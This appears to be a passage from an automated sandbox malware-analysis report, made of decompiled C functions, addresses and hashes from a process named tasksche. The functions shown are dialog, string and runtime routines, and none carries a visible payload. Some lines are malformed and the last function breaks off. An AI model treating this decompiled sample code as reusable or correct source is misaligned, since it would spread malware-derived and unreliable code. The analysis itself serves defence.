                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prologSecurity
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 2167059215-639343689
                                                                                              • Opcode ID: 668843457d3f320ef4c041a0620e582976ae6b8cc17d27ec4e60122bb8f86131
                                                                                              • Instruction ID: e80266907105dbdc6ea336272c15ef3f26093cba4c1f52b7c6092cd65192489b
                                                                                              • Opcode Fuzzy Hash: 668843457d3f320ef4c041a0620e582976ae6b8cc17d27ec4e60122bb8f86131
                                                                                              • Instruction Fuzzy Hash: 8D219372901259BEDF21AF55DC01BAF77689B04758F00803BF802B62C1C7BC8A559BAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E0040E1B2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                                                                                              				void* _v4100;
                                                                                              				void* __ebx;
                                                                                              				struct HWND__* _t15;
                                                                                              				void* _t25;
                                                                                              				void* _t26;
                                                                                              				signed int _t27;
                                                                                              				signed int _t29;
                                                                                              				void* _t35;
                                                                                              				struct HWND__* _t38;
                                                                                              				void* _t40;
                                                                                              				void* _t41;
                                                                                              
                                                                                              				E0041AAF0(0x1000);
                                                                                              				if( *0x44397a == 0) {
                                                                                              					_t15 =  *0x441844;
                                                                                              					_t38 = _t15;
                                                                                              					if(_a4 == 2 && IsWindowVisible(_t15) == 0) {
                                                                                              						_t38 = 0;
                                                                                              					}
                                                                                              					E0040A386(_t26, _a8, _a12,  &_v4100, 0x800);
                                                                                              					if( *0x44cf20 != 0 || DialogBoxParamW( *0x4335a4, L"GETPASSWORD1", _t38, E0040D477,  &_v4100) != 0) {
                                                                                              						_t25 = _a16;
                                                                                              						_t27 = 0x40;
                                                                                              						memcpy(_t25, 0x44ce20, _t27 << 2);
                                                                                              						_t41 = _t41 + 0xc;
                                                                                              						asm("movsw");
                                                                                              					} else {
                                                                                              						_t25 = _a16;
                                                                                              						E0040D033(_t25, _t25, 0x42a73c);
                                                                                              						 *0x44183c = 1;
                                                                                              					}
                                                                                              					if( *((char*)(_t25 + 0x100)) != 0) {
                                                                                              						_t40 = _t25;
                                                                                              						_t35 = 0x44387a;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t25 = _a16;
                                                                                              					_t40 = 0x44387a;
                                                                                              					_t35 = _t25;
                                                                                              					L11:
                                                                                              					_t29 = 0x40;
                                                                                              					memcpy(_t35, _t40, _t29 << 2);
                                                                                              					asm("movsw");
                                                                                              				}
                                                                                              				return  *((intOrPtr*)(_t25 + 0x100));
                                                                                              			}














                                                                                              0x0040e1ba
                                                                                              0x0040e1c9
                                                                                              0x0040e1de
                                                                                              0x0040e1e3
                                                                                              0x0040e1e5
                                                                                              0x0040e1f2
                                                                                              0x0040e1f2
                                                                                              0x0040e206
                                                                                              0x0040e212
                                                                                              0x0040e24e
                                                                                              0x0040e253
                                                                                              0x0040e25b
                                                                                              0x0040e25b
                                                                                              0x0040e25d
                                                                                              0x0040e236
                                                                                              0x0040e236
                                                                                              0x0040e240
                                                                                              0x0040e245
                                                                                              0x0040e245
                                                                                              0x0040e266
                                                                                              0x0040e268
                                                                                              0x0040e26a
                                                                                              0x00000000
                                                                                              0x0040e26a
                                                                                              0x0040e1cb
                                                                                              0x0040e1cb
                                                                                              0x0040e1ce
                                                                                              0x0040e1d3
                                                                                              0x0040e26f
                                                                                              0x0040e271
                                                                                              0x0040e272
                                                                                              0x0040e274
                                                                                              0x0040e274
                                                                                              0x0040e280

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1$z8D$z8D
                                                                                              • API String ID: 3157717868-3779298832
                                                                                              • Opcode ID: 8a5930b9f1bd4a7920270691445133db6bb9d1af5357342886f90841ecad1a96
                                                                                              • Instruction ID: 2ec29a5f94ea44b227bd1a9c17bea14e87d691145e51ce1093468d312523c58d
                                                                                              • Opcode Fuzzy Hash: 8a5930b9f1bd4a7920270691445133db6bb9d1af5357342886f90841ecad1a96
                                                                                              • Instruction Fuzzy Hash: B71159717002445BEB21DF62AC80B973B99AB08765F08007BFD446B2D1C7BC8CA0C76D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0040D3EE(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                                                              				void* _t11;
                                                                                              				void* _t17;
                                                                                              				void* _t21;
                                                                                              				struct HWND__* _t22;
                                                                                              				WCHAR* _t23;
                                                                                              
                                                                                              				_t23 = _a16;
                                                                                              				_t22 = _a4;
                                                                                              				if(E004060EE(_t21, _t22, _a8, _a12, _t23, L"RENAMEDLG", 0, 0) != 0) {
                                                                                              					L10:
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_t11 = _a8 - 0x110;
                                                                                              				if(_t11 == 0) {
                                                                                              					 *0x44cf28 = _t23;
                                                                                              					SetDlgItemTextW(_t22, 0x65, _t23);
                                                                                              					SetDlgItemTextW(_t22, 0x66,  *0x44cf28);
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(_t11 != 1) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                              				if(_t17 == 0) {
                                                                                              					GetDlgItemTextW(_t22, 0x66,  *0x44cf28, 0x800);
                                                                                              					_push(1);
                                                                                              					L7:
                                                                                              					EndDialog(_t22, ??);
                                                                                              					goto L10;
                                                                                              				}
                                                                                              				if(_t17 == 1) {
                                                                                              					_push(0);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              				goto L5;
                                                                                              			}








                                                                                              0x0040d3f2
                                                                                              0x0040d3f6
                                                                                              0x0040d411
                                                                                              0x0040d46e
                                                                                              0x00000000
                                                                                              0x0040d470
                                                                                              0x0040d416
                                                                                              0x0040d41b
                                                                                              0x0040d454
                                                                                              0x0040d461
                                                                                              0x0040d46c
                                                                                              0x00000000
                                                                                              0x0040d46c
                                                                                              0x0040d41e
                                                                                              0x0040d42a
                                                                                              0x00000000
                                                                                              0x0040d42a
                                                                                              0x0040d424
                                                                                              0x0040d425
                                                                                              0x0040d447
                                                                                              0x0040d44d
                                                                                              0x0040d430
                                                                                              0x0040d431
                                                                                              0x00000000
                                                                                              0x0040d431
                                                                                              0x0040d428
                                                                                              0x0040d42e
                                                                                              0x00000000
                                                                                              0x0040d42e
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$Dialog
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 1770891597-3299779563
                                                                                              • Opcode ID: 762bcebfea9f2beca08e3ffb6bbc5115bfac0753acb3b7587415e25b8287d6f5
                                                                                              • Instruction ID: a809f9c23db95260371581c6ee5cd384337b37eb9584205a8113e0e6bfd29c9a
                                                                                              • Opcode Fuzzy Hash: 762bcebfea9f2beca08e3ffb6bbc5115bfac0753acb3b7587415e25b8287d6f5
                                                                                              • Instruction Fuzzy Hash: 6F01D836A4421877DB205F949C41FBB3B69E705F50F544036FA01B61D0C6BAA8269BAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 50%
                                                                                              			E00405F3C(intOrPtr __ecx, void* __eflags) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t31;
                                                                                              				void* _t33;
                                                                                              
                                                                                              				E0041A4DC(E0042961B, _t33);
                                                                                              				_push(__ecx);
                                                                                              				_push("\xef\xbf\xb				_push(E00405E1B);
                                                                                              				_push(4);
                                                                                              				_t31 = __ecx;
                                                                                              				_push(0x12c);
                                                                                              				_push(__ecx);
                                                                                              				 *((intOrPtr*)(_t33 - 0x10)) = __ecx;
                                                                                              				E0041C6B6(__ecx, __eflags);
                                                                                              				_push("\xef\xbf\xb				_push(E00405E1B);
                                                                                              				_push(4);
                                                                                              				_push(0x178);
                                                                                              				_t22 = _t31 + 0x4b4;
                                                                                              				_push(_t31 + 0x4b4);
                                                                                              				 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                                              				E0041C6B6(_t31, 0);
                                                                                              				 *((char*)(_t33 - 4)) = 1;
                                                                                              				E0040CA39(_t31 + 0xa9c);
                                                                                              				 *((intOrPtr*)(_t31 + 0xa98)) = 0;
                                                                                              				E0041A820(0, _t31, 0, 0x4b0);
                                                                                              				E0041A820(0, _t22, 0, 0x5e0);
                                                                                              				 *((intOrPtr*)(_t31 + 0x4b0)) = 0;
                                                                                              				 *((intOrPtr*)(_t31 + 0xa94)) = 0;
                                                                                              				E0041A820(0, _t31 + 0xba4, 0, 0x400);
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
                                                                                              				return _t31;
                                                                                              			}







                                                                                              0x00405f41
                                                                                              0x00405f46
                                                                                              0x00405f4a
                                                                                              0x00405f4f
                                                                                              0x00405f54
                                                                                              0x00405f56
                                                                                              0x00405f58
                                                                                              0x00405f5d
                                                                                              0x00405f5e
                                                                                              0x00405f61
                                                                                              0x00405f66
                                                                                              0x00405f6b
                                                                                              0x00405f70
                                                                                              0x00405f72
                                                                                              0x00405f77
                                                                                              0x00405f7f
                                                                                              0x00405f80
                                                                                              0x00405f83
                                                                                              0x00405f8e
                                                                                              0x00405f92
                                                                                              0x00405f9e
                                                                                              0x00405fa4
                                                                                              0x00405fb0
                                                                                              0x00405fc2
                                                                                              0x00405fc8
                                                                                              0x00405fce
                                                                                              0x00405fde
                                                                                              0x00405fe6

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog
                                                                                              • String ID: r
                                                                                              • API String ID: 3013590873-3291565091
                                                                                              • Opcode ID: adb95f05f7a194937a5df8f484bb6bf36145664ded8c6b0a2324601c3f7e7fd4
                                                                                              • Instruction ID: fcb346f71e1c6521d09fa93fcec7134e0802dca7d1a5d7d76298086db4932847
                                                                                              • Opcode Fuzzy Hash: adb95f05f7a194937a5df8f484bb6bf36145664ded8c6b0a2324601c3f7e7fd4
                                                                                              • Instruction Fuzzy Hash: 880144B17417407AD220EB669C46FEBBAA8DB85B18F00041FB255661C2C7FC5941CA9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E0041DAD4(void* __edx, void* __esi, intOrPtr* _a4) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _t11;
                                                                                              				intOrPtr* _t15;
                                                                                              				intOrPtr* _t19;
                                                                                              				void* _t23;
                                                                                              				void* _t25;
                                                                                              
                                                                                              				_t24 = __edx;
                                                                                              				_t11 =  *((intOrPtr*)( *_a4));
                                                                                              				if(_t11 == 0xe0434f4d) {
                                                                                              					__eflags =  *((intOrPtr*)(E0041E9B4(_t23, __edx, _t25, __eflags) + 0x90));
                                                                                              					if(__eflags > 0) {
                                                                                              						_t15 = E0041E9B4(_t23, __edx, _t25, __eflags) + 0x90;
                                                                                              						 *_t15 =  *_t15 - 1;
                                                                                              						__eflags =  *_t15;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				} else {
                                                                                              					_t32 = _t11 - 0xe06d7363;
                                                                                              					if(_t11 != 0xe06d7363) {
                                                                                              						L5:
                                                                                              						__eflags = 0;
                                                                                              						return 0;
                                                                                              					} else {
                                                                                              						 *(E0041E9B4(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                                                                                              						_push(8);
                                                                                              						_push(0x42d8f0);
                                                                                              						E0041FA9C(_t23, _t25, __esi);
                                                                                              						_t19 =  *((intOrPtr*)(E0041E9B4(_t23, __edx, _t25, _t32) + 0x78));
                                                                                              						if(_t19 != 0) {
                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                              							 *_t19();
                                                                                              							_v8 = 0xfffffffe;
                                                                                              						}
                                                                                              						return E0041FAE1(E00423F89(_t23, _t24, _t25));
                                                                                              					}
                                                                                              				}
                                                                                              			}









                                                                                              0x0041dad4
                                                                                              0x0041dade
                                                                                              0x0041dae5
                                                                                              0x0041db04
                                                                                              0x0041db0b
                                                                                              0x0041db12
                                                                                              0x0041db17
                                                                                              0x0041db17
                                                                                              0x0041db17
                                                                                              0x00000000
                                                                                              0x0041dae7
                                                                                              0x0041dae7
                                                                                              0x0041daec
                                                                                              0x0041db19
                                                                                              0x0041db19
                                                                                              0x0041db1c
                                                                                              0x0041daee
                                                                                              0x0041daf3
                                                                                              0x0041ec8a
                                                                                              0x0041ec8c
                                                                                              0x0041ec91
                                                                                              0x0041ec9b
                                                                                              0x0041eca0
                                                                                              0x0041eca2
                                                                                              0x0041eca6
                                                                                              0x0041ecb1
                                                                                              0x0041ecb1
                                                                                              0x0041ecc2
                                                                                              0x0041ecc2
                                                                                              0x0041daec

                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0041DAEE
                                                                                                • Part of subcall function 0041E9B4: __getptd_noexit.LIBCMT ref: 0041E9B7
                                                                                                • Part of subcall function 0041E9B4: __amsg_exit.LIBCMT ref: 0041E9C4
                                                                                              • __getptd.LIBCMT ref: 0041DAFF
                                                                                              • __getptd.LIBCMT ref: 0041DB0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                              • String ID: MOC$csm
                                                                                              • API String ID: 803148776-1389381023
                                                                                              • Opcode ID: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                                                              • Instruction ID: 7ce874268d128f0e9cc5e4e4439fd54cca852ebc00a18d755191ea46e2ae681e
                                                                                              • Opcode Fuzzy Hash: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
                                                                                              • Instruction Fuzzy Hash: 8EE048755141048FDB50976AC445FA93394EB48318F1504A7E80CC7353D77CE8C0558B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E00421BA7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _t15;
                                                                                              				LONG* _t21;
                                                                                              				long _t23;
                                                                                              				void* _t31;
                                                                                              				LONG* _t33;
                                                                                              				void* _t34;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t35 = __eflags;
                                                                                              				_t29 = __edx;
                                                                                              				_t25 = __ebx;
                                                                                              				_push(0xc);
                                                                                              				_push(0x42d9d0);
                                                                                              				E0041FA9C(__ebx, __edi, __esi);
                                                                                              				_t31 = E0041E9B4(__ebx, __edx, __edi, _t35);
                                                                                              				_t15 =  *0x430da4; // 0xfffffffe
                                                                                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                              					E0041EFA3(_t25, 0xd);
                                                                                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                              					 *(_t34 - 0x1c) = _t33;
                                                                                              					__eflags = _t33 -  *0x430ca8; // 0x22116b0
                                                                                              					if(__eflags != 0) {
                                                                                              						__eflags = _t33;
                                                                                              						if(_t33 != 0) {
                                                                                              							_t23 = InterlockedDecrement(_t33);
                                                                                              							__eflags = _t23;
                                                                                              							if(_t23 == 0) {
                                                                                              								__eflags = _t33 - 0x430880;
                                                                                              								if(__eflags != 0) {
                                                                                              									_push(_t33);
                                                                                              									E0041A506(_t25, _t31, _t33, __eflags);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t21 =  *0x430ca8; // 0x22116b0
                                                                                              						 *(_t31 + 0x68) = _t21;
                                                                                              						_t33 =  *0x430ca8; // 0x22116b0
                                                                                              						 *(_t34 - 0x1c) = _t33;
                                                                                              						InterlockedIncrement(_t33);
                                                                                              					}
                                                                                              					 *(_t34 - 4) = 0xfffffffe;
                                                                                              					E00421C42();
                                                                                              				} else {
                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                              				}
                                                                                              				if(_t33 == 0) {
                                                                                              					E00421495(_t29, _t31, 0x20);
                                                                                              				}
                                                                                              				return E0041FAE1(_t33);
                                                                                              			}










                                                                                              0x00421ba7
                                                                                              0x00421ba7
                                                                                              0x00421ba7
                                                                                              0x00421ba7
                                                                                              0x00421ba9
                                                                                              0x00421bae
                                                                                              0x00421bb8
                                                                                              0x00421bba
                                                                                              0x00421bc2
                                                                                              0x00421be3
                                                                                              0x00421be9
                                                                                              0x00421bed
                                                                                              0x00421bf0
                                                                                              0x00421bf3
                                                                                              0x00421bf9
                                                                                              0x00421bfb
                                                                                              0x00421bfd
                                                                                              0x00421c00
                                                                                              0x00421c06
                                                                                              0x00421c08
                                                                                              0x00421c0a
                                                                                              0x00421c10
                                                                                              0x00421c12
                                                                                              0x00421c13
                                                                                              0x00421c18
                                                                                              0x00421c10
                                                                                              0x00421c08
                                                                                              0x00421c19
                                                                                              0x00421c1e
                                                                                              0x00421c21
                                                                                              0x00421c27
                                                                                              0x00421c2b
                                                                                              0x00421c2b
                                                                                              0x00421c31
                                                                                              0x00421c38
                                                                                              0x00421bca
                                                                                              0x00421bca
                                                                                              0x00421bca
                                                                                              0x00421bcf
                                                                                              0x00421bd3
                                                                                              0x00421bd8
                                                                                              0x00421be0

                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 00421BB3
                                                                                                • Part of subcall function 0041E9B4: __getptd_noexit.LIBCMT ref: 0041E9B7
                                                                                                • Part of subcall function 0041E9B4: __amsg_exit.LIBCMT ref: 0041E9C4
                                                                                              • __amsg_exit.LIBCMT ref: 00421BD3
                                                                                              • __lock.LIBCMT ref: 00421BE3
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00421C00
                                                                                              • InterlockedIncrement.KERNEL32(022116B0), ref: 00421C2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                              • String ID:
                                                                                              • API String ID: 4271482742-0
                                                                                              • Opcode ID: 74e5199f409b0e250bccaee7949834ceac0f5e9eb7994a886cf19954e8f2a892
                                                                                              • Instruction ID: 6d4d6cab2ca80c9586acdc371c3e58b42f7918e3e726cea937426c24952e9619
                                                                                              • Opcode Fuzzy Hash: 74e5199f409b0e250bccaee7949834ceac0f5e9eb7994a886cf19954e8f2a892
                                                                                              • Instruction Fuzzy Hash: 8401C439B40731ABC728AF56A40679E7760BF10724F94012BE804AB3A1CB3C6991DBDD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00411E81(void* __eflags, short* _a4, short* _a8, int _a12) {
                                                                                              				void* _t8;
                                                                                              				int _t12;
                                                                                              				int _t22;
                                                                                              				int _t23;
                                                                                              
                                                                                              				_t8 = E0041A7AF(_a4);
                                                                                              				_t22 = _a12;
                                                                                              				if(_t8 + 1 >= _t22) {
                                                                                              					_t23 = _t22;
                                                                                              				} else {
                                                                                              					_t23 = E0041A7AF(_a4) + 1;
                                                                                              				}
                                                                                              				if(E0041A7AF(_a8) + 1 >= _t22) {
                                                                                              					_t12 = _t22;
                                                                                              				} else {
                                                                                              					_t12 = E0041A7AF(_a8) + 1;
                                                                                              				}
                                                                                              				return CompareStringW(0x400, 0x1001, _a4, _t23, _a8, _t12);
                                                                                              			}







                                                                                              0x00411e89
                                                                                              0x00411e8e
                                                                                              0x00411e95
                                                                                              0x00411ea5
                                                                                              0x00411e97
                                                                                              0x00411ea2
                                                                                              0x00411ea2
                                                                                              0x00411eb3
                                                                                              0x00411ec1
                                                                                              0x00411eb5
                                                                                              0x00411ebe
                                                                                              0x00411ebe
                                                                                              0x00411ee0

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00411E89
                                                                                              • _wcslen.LIBCMT ref: 00411E9A
                                                                                              • _wcslen.LIBCMT ref: 00411EAA
                                                                                              • _wcslen.LIBCMT ref: 00411EB8
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409F60,__rar_,00000000,00000006,00000000,?,00000800), ref: 00411ED5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: a78696411e0fb58170a85e42f91a72465e9b1cb7d1a352a10a0ff52bf1fcbbb8
                                                                                              • Instruction ID: fd224344e63f22d7e065bf6fa160c6ce473b51916626f6dd2966927fcf662de7
                                                                                              • Opcode Fuzzy Hash: a78696411e0fb58170a85e42f91a72465e9b1cb7d1a352a10a0ff52bf1fcbbb8
                                                                                              • Instruction Fuzzy Hash: 5FF02436148148BFDF126F92EC01CDE3F26DB81375B244027FE298A0A0D635C9A29789
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E0040272E(intOrPtr __ecx, signed int __edx) {
                                                                                              				signed int _t142;
                                                                                              				char _t143;
                                                                                              				void* _t147;
                                                                                              				signed int _t148;
                                                                                              				unsigned int _t149;
                                                                                              				signed int _t153;
                                                                                              				signed int _t170;
                                                                                              				signed int _t173;
                                                                                              				void* _t178;
                                                                                              				signed int _t179;
                                                                                              				void* _t182;
                                                                                              				signed char _t183;
                                                                                              				void* _t196;
                                                                                              				void* _t205;
                                                                                              				signed char _t207;
                                                                                              				void* _t217;
                                                                                              				signed char _t218;
                                                                                              				void* _t232;
                                                                                              				signed char _t234;
                                                                                              				signed int _t235;
                                                                                              				signed int _t239;
                                                                                              				signed int _t246;
                                                                                              				void* _t247;
                                                                                              				signed char _t250;
                                                                                              				void* _t251;
                                                                                              				char* _t252;
                                                                                              				void* _t253;
                                                                                              				intOrPtr _t255;
                                                                                              				signed int _t260;
                                                                                              				intOrPtr _t262;
                                                                                              				signed char _t277;
                                                                                              				signed char _t280;
                                                                                              				signed char _t283;
                                                                                              				intOrPtr _t307;
                                                                                              				intOrPtr _t310;
                                                                                              				signed int _t312;
                                                                                              				signed char _t314;
                                                                                              				signed char _t316;
                                                                                              				void* _t318;
                                                                                              				void* _t320;
                                                                                              				signed int _t326;
                                                                                              				signed int _t339;
                                                                                              
                                                                                              				_t312 = __edx;
                                                                                              				_t318 = _t320 - 0x6c;
                                                                                              				E0041AAF0(0x20c0);
                                                                                              				_t314 =  *(_t318 + 0x74);
                                                                                              				 *((intOrPtr*)(_t318 + 0x68)) = __ecx;
                                                                                              				_t255 =  *((intOrPtr*)(_t314 + 0x14));
                                                                                              				_t142 = _t255 -  *(_t318 + 0x78);
                                                                                              				if(_t142 <  *(_t314 + 0x18)) {
                                                                                              					L83:
                                                                                              					return _t142;
                                                                                              				}
                                                                                              				 *(_t314 + 0x18) = _t142;
                                                                                              				if(_t255 - _t142 >= 2) {
                                                                                              					_t316 =  *(_t318 + 0x7c);
                                                                                              					while(1) {
                                                                                              						_t142 = E0040B60D(_t312);
                                                                                              						 *(_t318 + 0x64) = _t312;
                                                                                              						if((_t142 | _t312) == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t260 =  *(_t314 + 0x18);
